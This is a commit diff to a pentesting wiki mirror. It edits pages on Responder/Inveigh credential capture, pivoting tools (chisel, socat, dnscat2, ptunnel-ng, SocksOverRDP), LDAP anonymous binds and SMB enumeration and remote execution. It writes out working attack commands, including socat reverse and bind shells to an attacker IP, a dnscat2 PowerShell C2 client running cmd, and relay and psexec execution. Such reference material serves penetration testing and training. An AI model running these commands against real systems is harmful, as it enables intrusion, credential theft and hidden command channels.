mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [#3557] No subject
This commit is contained in:
parent
268cbcac27
commit
7b6ebc21a9
10 changed files with 274 additions and 117 deletions
|
@ -364,7 +364,8 @@
|
||||||
* [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md)
|
* [123/udp - Pentesting NTP](network-services-pentesting/pentesting-ntp.md)
|
||||||
* [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md)
|
* [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md)
|
||||||
* [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md)
|
* [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md)
|
||||||
* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb.md)
|
* [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md)
|
||||||
|
* [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md)
|
||||||
* [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md)
|
* [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md)
|
||||||
* [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md)
|
* [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md)
|
||||||
* [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md)
|
* [Cisco SNMP](network-services-pentesting/pentesting-snmp/cisco-snmp.md)
|
||||||
|
|
|
@ -138,7 +138,7 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s
|
||||||
|
|
||||||
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
|
The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`
|
||||||
|
|
||||||
### DHCP Poisoning
|
#### Responder - DHCP Poisoning
|
||||||
|
|
||||||
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
|
Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.
|
||||||
|
|
||||||
|
@ -152,7 +152,7 @@ However, spoofing DHCP answers has unique benefits. **It's definitely stealthier
|
||||||
./Responder.py -I eth0 -Pdv
|
./Responder.py -I eth0 -Pdv
|
||||||
```
|
```
|
||||||
|
|
||||||
### Capturing credentials
|
#### Responder - Capturing credentials
|
||||||
|
|
||||||
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
|
Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):
|
||||||
|
|
||||||
|
@ -164,11 +164,23 @@ It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
||||||
|
|
||||||
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
|
> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
|
||||||
|
|
||||||
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder.\
|
[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)was a PowerShell script, now it's a C# binary that has the same main features as Responder. There is a [**wiki**](https://github.com/Kevin-Robertson/Inveigh/wiki/Parameters) **** that lists all parameters and usage instructions.\
|
||||||
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
|
Another version can be found in [**InveighZero**](https://github.com/Kevin-Robertson/InveighZero).
|
||||||
|
|
||||||
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
|
![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
|
||||||
|
|
||||||
|
Or run it with more options:
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
|
||||||
|
```
|
||||||
|
|
||||||
|
Or run the C# version:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
Inveigh.exe
|
||||||
|
```
|
||||||
|
|
||||||
## NTML Relay Attack
|
## NTML Relay Attack
|
||||||
|
|
||||||
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
This attack relays **SMB authentication sessions** on an internal network to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**. Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
|
||||||
|
|
|
@ -202,22 +202,6 @@ rportfwd_local [bind port] [forward host] [forward port]
|
||||||
rportfwd_local stop [bind port]
|
rportfwd_local stop [bind port]
|
||||||
```
|
```
|
||||||
|
|
||||||
## Windows netsh
|
|
||||||
|
|
||||||
### Port2Port
|
|
||||||
|
|
||||||
You need to be a local admin (for any port)
|
|
||||||
|
|
||||||
```bash
|
|
||||||
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
|
||||||
# Example:
|
|
||||||
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
|
||||||
# Check the port forward was created:
|
|
||||||
netsh interface portproxy show v4tov4
|
|
||||||
# Delete port forward
|
|
||||||
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
|
||||||
```
|
|
||||||
|
|
||||||
## reGeorg
|
## reGeorg
|
||||||
|
|
||||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||||
|
@ -236,16 +220,19 @@ You need to use the **same version for client and server**
|
||||||
### socks
|
### socks
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
./chisel server -p 8080 --reverse #Server
|
./chisel server -p 8080 --reverse #Server -- Attacker
|
||||||
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
|
./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
|
||||||
#And now you can use proxychains with port 1080 (default)
|
#And now you can use proxychains with port 1080 (default)
|
||||||
|
|
||||||
|
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
|
||||||
|
./chisel client -v 10.10.10.10:8080 socks #Attacker
|
||||||
```
|
```
|
||||||
|
|
||||||
### Port forwarding
|
### Port forwarding
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
|
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
|
||||||
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
|
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
|
||||||
```
|
```
|
||||||
|
|
||||||
## Rpivot
|
## Rpivot
|
||||||
|
@ -281,7 +268,7 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
|
||||||
```
|
```
|
||||||
|
|
||||||
### Reverse shell
|
### Reverse shell
|
||||||
|
@ -294,13 +281,13 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||||
### Port2Port
|
### Port2Port
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
|
socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
|
||||||
```
|
```
|
||||||
|
|
||||||
### Port2Port through socks
|
### Port2Port through socks
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
|
socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
|
||||||
```
|
```
|
||||||
|
|
||||||
### Meterpreter through SSL Socat
|
### Meterpreter through SSL Socat
|
||||||
|
@ -364,6 +351,53 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
|
||||||
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
|
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Windows netsh
|
||||||
|
|
||||||
|
### Port2Port
|
||||||
|
|
||||||
|
You need to be a local admin (for any port)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
|
||||||
|
# Example:
|
||||||
|
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444
|
||||||
|
# Check the port forward was created:
|
||||||
|
netsh interface portproxy show v4tov4
|
||||||
|
# Delete port forward
|
||||||
|
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
|
||||||
|
```
|
||||||
|
|
||||||
|
## SocksOverRDP & Proxifier
|
||||||
|
|
||||||
|
You need to have **RDP access over the system**.\
|
||||||
|
Download:
|
||||||
|
|
||||||
|
1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
|
||||||
|
2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
|
||||||
|
|
||||||
|
In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Load SocksOverRDP.dll using regsvr32.exe
|
||||||
|
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
|
||||||
|
```
|
||||||
|
|
||||||
|
Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
|
||||||
|
|
||||||
|
**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary:
|
||||||
|
|
||||||
|
```
|
||||||
|
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Now, confirm in you machine (attacker) that the port 1080 is listening:
|
||||||
|
|
||||||
|
```
|
||||||
|
netstat -antb | findstr 1080
|
||||||
|
```
|
||||||
|
|
||||||
|
Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
|
||||||
|
|
||||||
## Proxify Windows GUI Apps
|
## Proxify Windows GUI Apps
|
||||||
|
|
||||||
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
|
You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
|
||||||
|
@ -423,14 +457,29 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
|
||||||
|
|
||||||
### DNSCat2
|
### DNSCat2
|
||||||
|
|
||||||
|
****[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
|
||||||
|
|
||||||
Establishes a C\&C channel through DNS. It doesn't need root privileges.
|
Establishes a C\&C channel through DNS. It doesn't need root privileges.
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
attacker> ruby ./dnscat2.rb tunneldomain.com
|
attacker> ruby ./dnscat2.rb tunneldomain.com
|
||||||
victim> ./dnscat2 tunneldomain.com
|
victim> ./dnscat2 tunneldomain.com
|
||||||
|
|
||||||
|
# If using it in an internal network for a CTF:
|
||||||
|
attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
|
||||||
|
victim> ./dnscat2 --dns host=10.10.10.10,port=5353
|
||||||
```
|
```
|
||||||
|
|
||||||
**Port forwarding with dnscat**
|
#### **In PowerShell**
|
||||||
|
|
||||||
|
You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
|
||||||
|
|
||||||
|
```
|
||||||
|
Import-Module .\dnscat2.ps1
|
||||||
|
Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
|
||||||
|
```
|
||||||
|
|
||||||
|
#### **Port forwarding with dnscat**
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
session -i <sessions_id>
|
session -i <sessions_id>
|
||||||
|
@ -460,11 +509,28 @@ Root is needed in both systems to create tun adapters and tunnel data between th
|
||||||
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
|
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### ptunnel-ng
|
||||||
|
|
||||||
|
****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Generate it
|
||||||
|
sudo ./autogen.sh
|
||||||
|
|
||||||
|
# Server -- victim (needs to be able to receive ICMP)
|
||||||
|
sudo ptunnel-ng
|
||||||
|
# Client - Attacker
|
||||||
|
sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
|
||||||
|
# Try to connect with SSH through ICMP tunnel
|
||||||
|
ssh -p 2222 -l user 127.0.0.1
|
||||||
|
# Create a socks proxy through the SSH connection through the ICMP tunnel
|
||||||
|
ssh -D 9050 -p 2222 -l user 127.0.0.1
|
||||||
|
```
|
||||||
|
|
||||||
## Other tools to check
|
## Other tools to check
|
||||||
|
|
||||||
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
|
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
|
||||||
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
|
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
|
||||||
* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -142,7 +142,7 @@ u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
|
||||||
|
|
||||||
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
|
Example taken from: [https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/)
|
||||||
|
|
||||||
## Clear text credentials
|
## Sniff clear text credentials
|
||||||
|
|
||||||
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
|
If LDAP is used without SSL you can **sniff credentials in plain text** in the network.
|
||||||
|
|
||||||
|
@ -150,7 +150,9 @@ Also, you can perform a **MITM** attack in the network **between the LDAP server
|
||||||
|
|
||||||
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
|
**If SSL is used** you can try to make **MITM** like the mentioned above but offering a **false certificate**, if the **user accepts it**, you are able to Downgrade the authentication method and see the credentials again.
|
||||||
|
|
||||||
## Bypass TLS SNI check
|
## Anonymous Access
|
||||||
|
|
||||||
|
### Bypass TLS SNI check
|
||||||
|
|
||||||
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
|
According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) just by accessing the LDAP server with an arbitrary domain name (like company.com) he was able to contact the LDAP service and extract information as an anonymous user:
|
||||||
|
|
||||||
|
@ -158,6 +160,11 @@ According to [**this writeup**](https://swarm.ptsecurity.com/exploiting-arbitrar
|
||||||
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### LDAP anonymous binds
|
||||||
|
|
||||||
|
[LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests. \
|
||||||
|
However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
|
||||||
|
|
||||||
## Valid Credentials
|
## Valid Credentials
|
||||||
|
|
||||||
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
|
If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
|
||||||
|
|
|
@ -51,7 +51,7 @@ With an anonymous null session you can access the IPC$ share and interact with s
|
||||||
|
|
||||||
## What is NTLM
|
## What is NTLM
|
||||||
|
|
||||||
If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../windows-hardening/ntlm/).
|
If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very insteresting this page about [**NTLM** where is explained **how this protocol works and how you can take advantage of it**](../../windows-hardening/ntlm/).
|
||||||
|
|
||||||
## **Enumeration**
|
## **Enumeration**
|
||||||
|
|
||||||
|
@ -66,7 +66,7 @@ nbtscan -r 192.168.0.1/24
|
||||||
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
|
To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
|
||||||
|
|
||||||
* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
|
* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version**
|
||||||
* \_Or\*\* this script\*\*:
|
* Or this script:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
#!/bin/sh
|
#!/bin/sh
|
||||||
|
@ -127,80 +127,23 @@ rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbff
|
||||||
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
|
||||||
```
|
```
|
||||||
|
|
||||||
### **Enumerating LSARPC and SAMR rpcclient**
|
### Enumerate Users
|
||||||
|
|
||||||
**Pat of this section was extracted from book "**_**Network Security Assesment 3rd Edition**_**"**
|
|
||||||
|
|
||||||
You can use the Samba **`rpcclient`** utility to interact with **RPC endpoints via named pipes**. The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon **establishing** a **SMB session** (often requiring credentials).
|
|
||||||
|
|
||||||
#### Server Info
|
|
||||||
|
|
||||||
* **Server Info**: `srvinfo`
|
|
||||||
|
|
||||||
#### Users enumeration
|
|
||||||
|
|
||||||
* **List users**: `querydispinfo` and `enumdomusers`
|
|
||||||
* **Get user details**: `queryuser <0xrid>`
|
|
||||||
* **Get user groups**: `queryusergroups <0xrid>`
|
|
||||||
* **GET SID of a user**: `lookupnames <username>`
|
|
||||||
* **Get users aliases**: `queryuseraliases [builtin|domain] <sid>`
|
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
# Brute-Force users RIDs
|
# This info should alerady being gathered from enum4linux and enum4linux-ng
|
||||||
for i in $(seq 500 1100); do
|
crackmapexec smb 10.10.10.10 --users
|
||||||
rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
|
|
||||||
done
|
|
||||||
|
|
||||||
# You can also use samrdump.py for this purpose
|
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
|
||||||
|
|
||||||
|
rpcclient -U "" -N 10.10.10.10
|
||||||
|
enumdomusers
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Groups enumeration
|
### **Enumerating LSARPC and SAMR rpcclient**
|
||||||
|
|
||||||
* **List groups**: `enumdomgroups`
|
{% content-ref url="rpcclient-enumeration.md" %}
|
||||||
* **Get group details**: `querygroup <0xrid>`
|
[rpcclient-enumeration.md](rpcclient-enumeration.md)
|
||||||
* **Get group members**: `querygroupmem <0xrid>`
|
{% endcontent-ref %}
|
||||||
|
|
||||||
#### Aliasgroups enumeration
|
|
||||||
|
|
||||||
* **List alias**: `enumalsgroups <builtin|domain>`
|
|
||||||
* **Get members**: `queryaliasmem builtin|domain <0xrid>`
|
|
||||||
|
|
||||||
#### Domains enumeration
|
|
||||||
|
|
||||||
* **List domains**: `enumdomains`
|
|
||||||
* **Get SID**: `lsaquery`
|
|
||||||
* **Domain info**: `querydominfo`
|
|
||||||
|
|
||||||
#### Shares enumeration
|
|
||||||
|
|
||||||
* **Enumerate all available shares**: `netshareenumall`
|
|
||||||
* **Info about a share**: `netsharegetinfo <share>`
|
|
||||||
|
|
||||||
#### More SIDs
|
|
||||||
|
|
||||||
* **Find SIDs by name**: `lookupnames <username>`
|
|
||||||
* **Find more SIDs**: `lsaenumsid`
|
|
||||||
* **RID cycling (check more SIDs)**: `lookupsids <sid>`
|
|
||||||
|
|
||||||
#### **Extra commands**
|
|
||||||
|
|
||||||
| **Command** | **Interface** | **Description** |
|
|
||||||
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
|
|
||||||
| queryuser | SAMR | Retrieve user information |
|
|
||||||
| querygroup | Retrieve group information | |
|
|
||||||
| querydominfo | Retrieve domain information | |
|
|
||||||
| enumdomusers | Enumerate domain users | |
|
|
||||||
| enumdomgroups | Enumerate domain groups | |
|
|
||||||
| createdomuser | Create a domain user | |
|
|
||||||
| deletedomuser | Delete a domain user | |
|
|
||||||
| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
|
|
||||||
| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | |
|
|
||||||
| lsaaddacctrights | Add rights to a user account | |
|
|
||||||
| lsaremoveacctrights | Remove rights from a user account | |
|
|
||||||
| dsroledominfo | LSARPC-DS | Get primary domain information |
|
|
||||||
| dsenumdomtrusts | Enumerate trusted domains within an AD forest | |
|
|
||||||
|
|
||||||
To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](135-pentesting-msrpc.md).
|
|
||||||
|
|
||||||
### GUI connection from linux
|
### GUI connection from linux
|
||||||
|
|
||||||
|
@ -410,10 +353,10 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get
|
||||||
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
|
||||||
```
|
```
|
||||||
|
|
||||||
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
|
### [**psexec**](../../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/ntlm/smbexec.md)
|
||||||
|
|
||||||
Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
|
Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
|
||||||
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
|
**More info** about [**psexec** ](../../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/ntlm/smbexec.md).\
|
||||||
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -426,7 +369,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
|
||||||
|
|
||||||
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
|
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
|
||||||
|
|
||||||
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
|
### [wmiexec](../../windows-hardening/ntlm/wmicexec.md)/dcomexec
|
||||||
|
|
||||||
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
|
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
|
||||||
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
||||||
|
@ -447,7 +390,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N
|
||||||
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
|
||||||
```
|
```
|
||||||
|
|
||||||
### [AtExec](../windows-hardening/ntlm/atexec.md)
|
### [AtExec](../../windows-hardening/ntlm/atexec.md)
|
||||||
|
|
||||||
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
|
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
|
||||||
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
|
||||||
|
@ -473,7 +416,7 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
|
||||||
## SMB relay attack
|
## SMB relay attack
|
||||||
|
|
||||||
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
|
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
|
||||||
[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||||
|
|
||||||
## SMB-Trap
|
## SMB-Trap
|
||||||
|
|
||||||
|
@ -488,17 +431,17 @@ This happens with the functions:
|
||||||
|
|
||||||
Which are used by some browsers and tools (like Skype)
|
Which are used by some browsers and tools (like Skype)
|
||||||
|
|
||||||
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
|
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (93).png>)
|
||||||
|
|
||||||
### SMBTrap using MitMf
|
### SMBTrap using MitMf
|
||||||
|
|
||||||
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
|
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../.gitbook/assets/image (94).png>)
|
||||||
|
|
||||||
## NTLM Theft
|
## NTLM Theft
|
||||||
|
|
||||||
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack).
|
Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](./#smb-relay-attack).
|
||||||
|
|
||||||
[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
|
